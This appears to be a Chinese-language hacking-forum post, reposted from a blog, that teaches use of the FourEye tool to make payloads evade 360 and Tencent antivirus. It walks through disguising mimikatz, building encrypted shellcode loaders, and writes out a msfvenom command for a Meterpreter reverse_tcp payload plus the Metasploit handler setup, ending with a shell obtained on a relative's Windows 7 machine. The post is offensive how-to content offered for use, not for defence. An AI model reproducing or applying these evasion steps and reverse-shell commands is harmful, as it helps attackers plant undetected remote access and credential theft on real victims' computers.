Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

msfconsole免杀 完美绕过360

 Share


Recommended Posts

本文将为你推荐一款比较优秀的免杀工具,安装简单,免杀效果还行。他就是FourEye,本文一起来看看吧。

安装与环境

测试环境

  • kali2022
  • win7 (64)

安装依赖

安装mingw-w64,如果不安装,则不能正常生成相关shell,安装也很简单,执行下面命令即可。

apt-get install mingw-w64

http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/2222_20220917215335.png

下载项目与安装

git clone https://github.com/lengjibo/FourEye.git
cd FourEye
pip install -r requirements.txt
python3 BypassFramework.py

如果顺利的话,安装成功后效果如下:

http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/3333_20220917215521.png

牛刀小试

这里我们用mimikatz.exe测试,先从github上面下载该工具。一般情况该工具会被安全工具直接删掉。
打开脚本后,选择EXE类型,将mimikatz的绝对路径写入,回车后稍等一会,会在/root目录下生成一个重新命名的mimikatz

http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/555_20220917220551.png
免杀效果

http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/5656_20220917225633.png
看起来还不错,国内的主流360和腾讯都是免杀的。

基于shellcode的免杀

运行命令后,输入shellcode

http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/67_20220917225839.png
输入list可见所有的payload

选择免杀方式

  • 1:Fiber、
  • 2:APC、
  • 3:图片分离,

选择加密方式

xor或者rot13
选择位数,x64或者x86

生成shell execute

http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/88899_20220917230313.png

对msfconsole免杀

我们在玩msf时,生成的shell是最基本的shell,很容易被查杀,利用此工具可以完美解决此问题。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.123.23 LPORT=7788 -f raw -o shell.raw

配置msf

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.123.23
set lport 444
exploit

上线效果

http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/33334444_20220917234904.png

360查杀

http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/77788_20220917235236.png

总结

这款工具相对来说安装和使用比较简单,免杀效果也较好。但是不知道是什么原因win10系统不能得到反弹,只能在表妹的win764位机上面成功得到了shell。


版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/3667.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...